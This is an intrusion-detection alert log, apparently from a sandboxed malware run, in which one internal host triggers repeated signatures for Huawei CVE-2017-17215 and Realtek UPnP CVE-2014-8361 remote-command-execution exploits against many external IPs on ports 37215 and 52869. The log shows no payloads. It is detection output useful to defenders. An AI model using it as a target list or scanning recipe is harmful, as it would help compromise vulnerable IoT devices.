                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608037215192.168.2.23223.98.49.191
                                      07/20/24-23:01:43.047922TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26002252869192.168.2.2398.94.65.60
                                      07/20/24-23:01:44.144821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5736652869192.168.2.231.111.156.136
                                      07/20/24-23:01:08.567236TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25936852869192.168.2.23153.15.211.214
                                      07/20/24-23:01:08.663244TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25854252869192.168.2.23139.21.143.158
                                      07/20/24-23:01:45.432263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24686652869192.168.2.23110.45.133.89
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957837215192.168.2.23157.83.235.248
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209837215192.168.2.23157.225.33.253
                                      07/20/24-23:01:56.239090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4149252869192.168.2.23164.216.95.45
                                      07/20/24-23:01:46.561347TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615311452869192.168.2.2363.138.19.167
                                      07/20/24-23:01:20.150638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724637215192.168.2.2360.7.102.124
                                      07/20/24-23:01:44.484644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4970452869192.168.2.23105.187.39.89
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641837215192.168.2.2344.253.8.229
                                      07/20/24-23:01:26.138638TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614401452869192.168.2.23142.4.77.39
                                      07/20/24-23:01:43.209467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4415452869192.168.2.2354.184.6.19
                                      07/20/24-23:02:11.743968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5286852869192.168.2.23184.146.237.12
                                      07/20/24-23:01:53.237113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5122652869192.168.2.23160.211.55.1
                                      07/20/24-23:01:42.874808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5434852869192.168.2.23146.0.35.148
                                      07/20/24-23:01:56.845732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3645452869192.168.2.2360.59.133.184
                                      07/20/24-23:01:59.104072TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24943252869192.168.2.23121.198.173.54
                                      07/20/24-23:01:14.100332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263037215192.168.2.2389.245.53.30
                                      07/20/24-23:01:27.660100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195837215192.168.2.23197.195.116.74
                                      07/20/24-23:01:44.895849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143852869192.168.2.23120.63.90.68
                                      07/20/24-23:01:58.717674TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616056652869192.168.2.23106.40.108.231
                                      07/20/24-23:01:20.591350TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4217252869192.168.2.234.129.239.131
                                      07/20/24-23:01:42.014480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4603852869192.168.2.23152.44.195.237
                                      07/20/24-23:01:00.633742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418437215192.168.2.2341.78.37.100
                                      07/20/24-23:01:03.143706TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613872852869192.168.2.2325.222.87.118
                                      07/20/24-23:01:01.469737TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433652869192.168.2.2324.167.37.167
                                      07/20/24-23:01:42.474339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3705852869192.168.2.2371.221.213.203
                                      07/20/24-23:01:11.817436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5320637215192.168.2.2341.222.86.83
                                      07/20/24-23:01:49.075905TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615449852869192.168.2.23125.106.198.203
                                      07/20/24-23:01:40.307218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844437215192.168.2.23197.63.159.44
                                      07/20/24-23:01:43.843278TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25750852869192.168.2.23182.49.153.25
                                      07/20/24-23:01:46.054775TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25073852869192.168.2.23192.178.20.121
                                      07/20/24-23:02:00.351070TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24525652869192.168.2.23130.165.149.247
                                      07/20/24-23:01:03.115715TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6002052869192.168.2.23195.64.245.14
                                      07/20/24-23:01:08.611773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3985652869192.168.2.23104.75.200.235
                                      07/20/24-23:01:44.440718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4942852869192.168.2.23159.247.88.93
                                      07/20/24-23:01:43.013771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4961452869192.168.2.23149.136.40.221
                                      07/20/24-23:01:44.054566TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25045852869192.168.2.2344.113.54.165
                                      07/20/24-23:01:54.702517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3359252869192.168.2.2383.238.5.172
                                      07/20/24-23:01:43.659105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3632452869192.168.2.2399.176.241.96
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5428637215192.168.2.2341.115.147.179
                                      07/20/24-23:01:48.834296TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23379652869192.168.2.2350.12.228.50
                                      07/20/24-23:01:42.280418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615474852869192.168.2.2375.163.230.218
                                      07/20/24-23:01:47.850156TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23539852869192.168.2.2391.148.233.46
                                      07/20/24-23:02:03.245732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3720452869192.168.2.2384.248.195.35
                                      07/20/24-23:01:41.417573TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614270052869192.168.2.23163.18.131.94
                                      07/20/24-23:01:49.775041TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24810252869192.168.2.2375.33.175.78
                                      07/20/24-23:01:46.358381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4279452869192.168.2.23203.57.14.26
                                      07/20/24-23:01:43.147289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4180652869192.168.2.23113.1.100.136
                                      07/20/24-23:00:57.221482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015037215192.168.2.2341.226.72.201
                                      07/20/24-23:01:43.160906TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616025052869192.168.2.23125.137.245.127
                                      07/20/24-23:01:42.966087TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614963452869192.168.2.2331.247.155.57
                                      07/20/24-23:01:44.452218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5233052869192.168.2.23114.234.94.36
                                      07/20/24-23:01:52.393089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25843652869192.168.2.23132.247.218.225
                                      07/20/24-23:01:48.965786TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25656452869192.168.2.23216.13.41.148
                                      07/20/24-23:01:20.110861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318637215192.168.2.23104.171.59.59
                                      07/20/24-23:01:21.937814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251237215192.168.2.23157.251.195.250
                                      07/20/24-23:00:59.154067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725637215192.168.2.23157.43.107.32
                                      07/20/24-23:01:21.951975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058437215192.168.2.23157.58.18.134
                                      07/20/24-23:01:55.994693TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5377452869192.168.2.23210.209.80.73
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239837215192.168.2.2372.213.126.209
                                      07/20/24-23:01:56.001165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6044452869192.168.2.23133.79.190.240
                                      07/20/24-23:01:41.263140TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614754052869192.168.2.23156.42.191.231
                                      07/20/24-23:01:04.601975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614738252869192.168.2.2387.137.214.123
                                      07/20/24-23:01:58.905147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4693252869192.168.2.2359.213.19.147
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918837215192.168.2.2341.183.204.254
                                      07/20/24-23:02:12.214887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4461252869192.168.2.2378.197.203.89
                                      07/20/24-23:00:57.221280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312637215192.168.2.23197.4.26.126
                                      07/20/24-23:01:45.015200TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24641252869192.168.2.2350.218.167.53
                                      07/20/24-23:01:44.683789TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23453052869192.168.2.2357.222.50.62
                                      07/20/24-23:01:53.099889TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616037052869192.168.2.2381.96.129.112
                                      07/20/24-23:02:11.506914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3697452869192.168.2.2319.55.206.132
                                      07/20/24-23:01:54.277123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3637652869192.168.2.2318.232.199.152
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228437215192.168.2.23157.197.135.159
                                      07/20/24-23:01:08.683684TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23407652869192.168.2.23206.248.87.37
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034637215192.168.2.23197.2.142.127
                                      07/20/24-23:01:21.928521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676237215192.168.2.23197.23.40.145
                                      07/20/24-23:01:44.338159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5556852869192.168.2.2353.50.131.136
                                      07/20/24-23:01:41.345953TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615917652869192.168.2.2386.18.150.91
                                      07/20/24-23:01:43.890780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614817652869192.168.2.23139.2.152.124
                                      07/20/24-23:01:08.595072TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25893852869192.168.2.23166.7.60.196
                                      07/20/24-23:01:08.630327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4492652869192.168.2.23181.219.175.178
                                      07/20/24-23:01:41.416217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4336052869192.168.2.2332.178.44.200
                                      07/20/24-23:01:11.634372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905637215192.168.2.2341.84.51.227
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3991837215192.168.2.2396.102.210.180
                                      07/20/24-23:00:59.194576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913837215192.168.2.23150.124.88.37
                                      07/20/24-23:01:27.650975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576437215192.168.2.23222.180.112.139
                                      07/20/24-23:01:42.778303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3894452869192.168.2.2393.78.34.12
                                      07/20/24-23:01:43.266134TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3339652869192.168.2.23219.30.72.57
                                      07/20/24-23:01:56.315740TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615086652869192.168.2.23162.250.126.53
                                      07/20/24-23:01:55.536863TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24896052869192.168.2.23117.131.224.39
                                      07/20/24-23:02:04.592319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4978652869192.168.2.23120.171.198.157
                                      07/20/24-23:01:42.699478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3925052869192.168.2.23165.86.188.195
                                      07/20/24-23:01:01.285840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615226852869192.168.2.23207.223.182.162
                                      07/20/24-23:01:11.631937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570237215192.168.2.23197.37.248.61
                                      07/20/24-23:01:42.365783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6072252869192.168.2.23132.173.89.17
                                      07/20/24-23:01:57.655207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4770652869192.168.2.23219.253.193.1
                                      07/20/24-23:01:04.097857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5906237215192.168.2.2391.108.5.216
                                      07/20/24-23:01:27.649996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4201037215192.168.2.23197.216.112.16
                                      07/20/24-23:01:08.599362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5305452869192.168.2.23161.203.121.55
                                      07/20/24-23:01:31.982478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940037215192.168.2.2341.157.201.160
                                      07/20/24-23:01:00.633810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.2391.110.161.158
                                      07/20/24-23:01:05.010861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5864652869192.168.2.2370.148.71.209
                                      07/20/24-23:02:12.234515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615538452869192.168.2.23202.77.166.232
                                      07/20/24-23:01:47.383355TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4409652869192.168.2.2348.223.177.47
                                      07/20/24-23:01:49.525770TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25781252869192.168.2.2374.81.74.58
                                      07/20/24-23:01:55.409249TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25865252869192.168.2.2390.72.98.132
                                      07/20/24-23:01:53.267115TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25496452869192.168.2.2397.241.192.98
                                      07/20/24-23:01:51.943792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189452869192.168.2.23210.84.36.218
                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5650237215192.168.2.23197.161.187.52
                                      07/20/24-23:01:31.329969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4757852869192.168.2.23151.83.163.85
                                      07/20/24-23:01:41.676253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4459452869192.168.2.2349.9.206.193
                                      07/20/24-23:01:08.578727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3808052869192.168.2.2348.69.126.229
                                      07/20/24-23:01:01.831747TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613704452869192.168.2.23117.27.97.229
                                      07/20/24-23:01:58.093784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24908252869192.168.2.2364.27.46.251
                                      07/20/24-23:01:55.851237TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5353252869192.168.2.23162.200.88.148
                                      07/20/24-23:01:14.366797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3379452869192.168.2.2361.157.174.11
                                      07/20/24-23:01:48.386032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3767252869192.168.2.232.166.49.173
                                      07/20/24-23:01:57.747300TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615846452869192.168.2.23171.245.11.17
                                      07/20/24-23:01:01.788008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4107852869192.168.2.23173.195.200.196
                                      07/20/24-23:01:41.404974TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614095852869192.168.2.2363.208.18.63
                                      07/20/24-23:01:44.945183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613377852869192.168.2.2334.82.199.243
                                      07/20/24-23:01:49.352576TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4207252869192.168.2.2393.177.145.85
                                      07/20/24-23:00:57.221048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627837215192.168.2.23157.203.14.217
                                      07/20/24-23:01:08.659435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3971052869192.168.2.2325.108.103.192
                                      07/20/24-23:01:49.810143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3798052869192.168.2.2357.114.247.43
                                      07/20/24-23:01:42.285526TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24389652869192.168.2.2362.203.112.129
                                      07/20/24-23:01:42.322405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3510052869192.168.2.23203.80.83.187
                                      07/20/24-23:01:03.412385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3833452869192.168.2.23207.112.16.238
                                      07/20/24-23:01:47.912435TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615982652869192.168.2.2394.86.220.196
                                      07/20/24-23:01:48.191657TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613967652869192.168.2.23195.166.157.114
                                      07/20/24-23:00:59.194576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913837215192.168.2.23150.124.88.37
                                      07/20/24-23:01:20.591863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4638252869192.168.2.2343.124.104.253
                                      07/20/24-23:01:01.453951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4250252869192.168.2.23155.42.58.223
                                      07/20/24-23:01:34.048618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134637215192.168.2.23157.167.78.225
                                      07/20/24-23:01:44.648889TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5641852869192.168.2.2390.237.72.71
                                      07/20/24-23:01:45.453485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3419652869192.168.2.2349.79.18.186
                                      07/20/24-23:01:04.100971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912437215192.168.2.23197.22.178.158
                                      07/20/24-23:01:47.420081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4566652869192.168.2.23139.163.81.215
                                      07/20/24-23:01:49.064169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273852869192.168.2.23210.209.80.73
                                      07/20/24-23:01:50.313969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24836852869192.168.2.23198.250.155.116
                                      07/20/24-23:01:02.048113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046637215192.168.2.23157.246.129.121
                                      07/20/24-23:01:41.258056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614045652869192.168.2.2396.234.113.72
                                      07/20/24-23:00:57.220899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078837215192.168.2.23157.147.238.186
                                      07/20/24-23:01:03.426187TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613601252869192.168.2.23205.187.52.139
                                      07/20/24-23:01:50.370395TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3959852869192.168.2.23206.37.245.255
                                      07/20/24-23:03:46.099099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5308852869192.168.2.23112.255.225.88
                                      07/20/24-23:01:42.164492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4544252869192.168.2.23106.2.127.68
                                      07/20/24-23:01:27.677519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450437215192.168.2.2336.225.241.35
                                      07/20/24-23:01:41.459025TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614273852869192.168.2.2369.239.30.22
                                      07/20/24-23:01:49.170008TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26061652869192.168.2.2393.106.207.118
                                      07/20/24-23:01:08.588009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4310652869192.168.2.23104.152.150.214
                                      07/20/24-23:01:42.636583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4365252869192.168.2.23167.4.219.92
                                      07/20/24-23:01:44.252201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387052869192.168.2.23207.27.209.75
                                      07/20/24-23:01:46.254249TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614088252869192.168.2.2387.152.13.65
                                      07/20/24-23:01:49.490945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3650252869192.168.2.23110.15.34.17
                                      07/20/24-23:01:48.602356TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24453452869192.168.2.2337.247.244.116
                                      07/20/24-23:02:00.056416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4361452869192.168.2.23147.8.193.70
                                      07/20/24-23:01:02.340273TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4594852869192.168.2.23122.204.212.245
                                      07/20/24-23:01:07.005156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440037215192.168.2.23197.82.145.73
                                      07/20/24-23:01:49.387850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615049252869192.168.2.2348.81.156.141
                                      07/20/24-23:02:11.791090TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5092052869192.168.2.2391.117.171.160
                                      07/20/24-23:01:24.885849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525837215192.168.2.23181.123.95.218
                                      07/20/24-23:02:05.547419TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5526452869192.168.2.23182.119.21.176
                                      07/20/24-23:01:02.095698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525037215192.168.2.2399.184.135.95
                                      07/20/24-23:01:02.064358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235837215192.168.2.2317.67.251.17
                                      07/20/24-23:01:43.206220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3714252869192.168.2.2343.216.241.103
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584037215192.168.2.2341.240.65.224
                                      07/20/24-23:01:27.650643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983037215192.168.2.2341.78.192.6
                                      07/20/24-23:01:41.280927TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4579852869192.168.2.23187.89.64.185
                                      07/20/24-23:01:44.856714TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3487452869192.168.2.23109.170.40.38
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619837215192.168.2.23157.3.230.130
                                      07/20/24-23:01:26.019285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5876052869192.168.2.2336.125.123.117
